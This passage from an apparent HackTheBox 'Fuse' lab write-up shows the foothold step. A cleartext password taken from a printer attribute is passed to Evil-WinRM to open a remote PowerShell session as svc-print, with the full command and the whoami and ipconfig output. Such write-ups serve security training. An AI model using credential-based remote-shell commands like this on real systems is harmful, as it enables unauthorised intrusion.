Evil-WinRM
The CLEARTEXT password extracted from one of the attribute of the network printer belongs to the svc-printer user, who is has an extensive transitive group membership that allows the user to PSRemote to the target system.
As discovered by Nmap earlier, there is a WinRM service running on the target port 5985
┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ evil-winrm -i $IP -u 'fabricorp.local\svc-print' -p '$fab@s3Rv1ce$1'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*evil-winrm* ps c:\Users\svc-print\Documents> hostname
Fuse
*evil-winrm* ps c:\Users\svc-print\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::bb
ipv6 address. . . . . . . . . . . : dead:beef::786e:10c2:1173:5102
link-local ipv6 address . . . . . : fe80::786e:10c2:1173:5102%5
ipv4 address. . . . . . . . . . . : 10.10.10.193
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
10.10.10.2
tunnel adapter isatap.{af2c7a34-a136-4854-894e-84f30da6c214}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : htbInitially Foothold established to the target system as the svc-print user